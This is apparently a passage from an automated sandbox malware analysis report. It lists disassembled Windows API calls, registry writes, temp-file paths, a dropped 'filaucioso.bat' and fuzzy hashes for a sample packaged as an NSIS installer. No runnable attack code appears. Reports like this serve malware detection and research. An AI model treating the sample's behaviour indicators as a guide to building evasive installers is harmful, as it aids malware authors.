                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                        • Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
                                                                        • Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                        • Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                        • wsprintfA.USER32 ref: 0040496A
                                                                        • SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
                                                                        • Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
                                                                        • Opcode Fuzzy Hash: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
                                                                        • Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj1E85.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402488
                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj1E85.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004024C5
                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1E85.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CloseValuelstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp
                                                                        • API String ID: 2655323295-1336346575
                                                                        • Opcode ID: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
                                                                        • Instruction ID: d7f14aed55912e39ad141723e2cbb786b74cb62cb57f73557c42781e6368b2a7
                                                                        • Opcode Fuzzy Hash: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
                                                                        • Instruction Fuzzy Hash: BC119071E00218BEEB01EFA58E49EAE7BB5EB48314F21443BF504B72C1C6F85D419A18
                                                                        APIs
                                                                          • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Desalinates Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45
                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AC6
                                                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405AD6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa21F3.tmp
                                                                        • API String ID: 3248276644-3707416367
                                                                        • Opcode ID: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
                                                                        • Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
                                                                        • Opcode Fuzzy Hash: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
                                                                        • Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040598B
                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 00405994
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 004059A5
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405985
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3081826266
                                                                        • Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                        • Instruction ID: 19b991fbecd43d68fcf8fbe3975c191da3a7c8eaa4a3e5077e024cb3b188d11e
                                                                        • Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                        • Instruction Fuzzy Hash: 8DD0A7A21059306AE20266159C09DDB19088F12315B060027F101B2191C63C0D1187FE
                                                                        APIs
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Close$Enum
                                                                        • String ID:
                                                                        • API String ID: 464197530-0
                                                                        • Opcode ID: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
                                                                        • Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
                                                                        • Opcode Fuzzy Hash: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
                                                                        • Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8
                                                                        APIs
                                                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                        • CharNextA.USER32(00000000), ref: 00405A31
                                                                        • CharNextA.USER32(00000000), ref: 00405A45
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\nsa21F3.tmp, xrefs: 00405A1F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsa21F3.tmp
                                                                        • API String ID: 3213498283-3845321688
                                                                        • Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                        • Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
                                                                        • Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                        • Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,00402F3E,?), ref: 00402D73
                                                                        • GetTickCount.KERNEL32 ref: 00402D91
                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                        • Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
                                                                        • Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                        • Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 004050B7
                                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00405108
                                                                          • Part of subcall function 004040C7: SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 004040D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                        • Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
                                                                        • Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                        • Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040374D,00403567,?,?,00000006,00000008,0000000A), ref: 0040378F
                                                                        • GlobalFree.KERNEL32(00B0B678), ref: 00403796
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403775
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-3081826266
                                                                        • Opcode ID: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
                                                                        • Instruction ID: 7399a24566e835d4bf74ae8faf6f599a32d3c581d2ea115a227339331e7fa0df
                                                                        • Opcode Fuzzy Hash: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
                                                                        • Instruction Fuzzy Hash: 1BE0C273401120ABC6216F15ED0871A777C6F46B27F02C12BF8407B26087781C434FC8
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(80000000,C:\ProgramData,00402E30,C:\ProgramData,C:\ProgramData,C:\ProgramData\filaucioso.bat,C:\ProgramData\filaucioso.bat,80000000,00000003), ref: 004059D2
                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\ProgramData,00402E30,C:\ProgramData,C:\ProgramData,C:\ProgramData\filaucioso.bat,C:\ProgramData\filaucioso.bat,80000000,00000003), ref: 004059E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
